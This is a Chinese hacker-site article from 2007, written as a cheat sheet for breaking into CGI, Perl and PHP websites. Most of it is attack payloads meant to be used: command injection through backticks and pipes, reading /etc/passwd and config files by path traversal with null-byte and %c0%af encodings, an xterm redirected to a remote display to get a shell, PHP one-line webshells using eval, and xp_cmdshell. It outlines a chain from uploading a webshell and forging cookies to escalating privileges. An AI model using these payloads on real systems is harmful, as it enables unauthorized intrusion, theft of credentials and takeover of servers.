黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 文章正文
[图文]CGI网站漏洞的检测入侵
        ★★★★★
CGI网站漏洞的检测入侵
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-22

总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权

感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
注“
perl脚本的漏洞大多出在open()、system()或者 ''调用中。前者允许读写和执行,而后两个允许执行。
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET

http://..../cgi-bin/home/news/sub.pl?12 随意构造
http://..../cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
http://....//cgi-bin/home/news/sub.pl?`ls` 单引号
http://....//cgi-bin/home/news/sub.pl?`id`
http://....//cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
http://....//cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` 非常好的思路,把代码cat回来显示

http://....//test.pl;ls|
http://....//index.cgi?page=|;ls+-la+/%0aid%0awhich+xterm|
http://....//index.cgi?page=|;xterm+-isplay+10.0.1.21:0.0+%26|
http://....//test.pl?';id' 类似''内的操作和命令执行自己构造
比如:cat<'/home1/siteadm/cgi-bin/home/news/test.pl'` 把pl代码显示出来。
http://....//index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection

http://.../test.pl?&........ /../../etc/passwd

http://.../cgi-bin/club/scripts/userinfo.pl?user=./test 前面加./
http://.../cgi-bin/club/scripts/userinfo.pl?user=test%00 注意后面的 %00 别弄丢了
http://.../cgi-bin/club/scripts/userinfo.pl?user=../../../../etc/passwd%00

http://.../show.php?filename=../../../../../../../home/murong/include/config.php 查看php代码
http://.../show.php?filename=../../../../../../../home/murong/admin/global.php

emm和ps的一句话"<?copy ($a,$b);unlink($a);?>"
echo "<?php copy(\$_FILES[MyFile][tmp_name],\$_FILES[MyFile][name]);?>" > up.php
<?php eval($_POST[cmd]);?>

http://.../cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

http://.../cgi-bin/club/scripts\;'less showpost.pl\' 并且寻找(用\'/\')\'Select\' 字符串

http://.../cgi-bin/club/scripts/..%c0%af../..%c0%af../bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
http://.../csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法
http://.../index.html#cmd.exe
http://.../index.html?dummyparam=xp_cmdshell
lynx http://.../cgi-bin/htmlscript?../../../../etc/passwd

多收集点

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    PPPOE验证缺陷所带来的危害03-21
    Ce-Admin新闻发布系统漏洞分析02-07
    Discuz漏洞分析11-28
    入侵检测PHP程序中的目录遍历漏洞10-12
    主流入侵检测产品大比较10-03
    一种新的带宽攻击方式(图)06-16
    Javascript实现评估用户输入密码05-30
    针锋相对:主要的反NIDS技术应用05-22
    dvbbs7.1sp1最新漏洞的研究和利用05-13
    IE mhtml redirection漏洞利用方05-12
    Php后门的隐藏技巧测试报告05-11
    McAfee IntruShield 2600入侵防护05-09
    相 关 文 章
  • dxbbs漏洞(通杀7.3以前所有版本)

  • 记对一足球推荐站点的渗透

  • Vista+谷歌拼音输入法重现输入法漏洞

  • 如何黑钱?揭露服务器四大猫腻

  • 优秀站长访谈:个人网站的定位推广和赚

  • 黑客如何穿透ADSL路由入侵内网

  • 搜索引擎不收录网站页面的15个原因

  • 利用微软动画光标漏洞的复合型蠕虫现身

  • ANI 漏洞第三方补丁被破[附新的第三方补

  • 图文解析冒充QQ宠物网站的骗人网址

  • QQ Traveler漏洞分析与利用(0day)

  • 对于最近几天的IE新漏洞临时解决方法

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886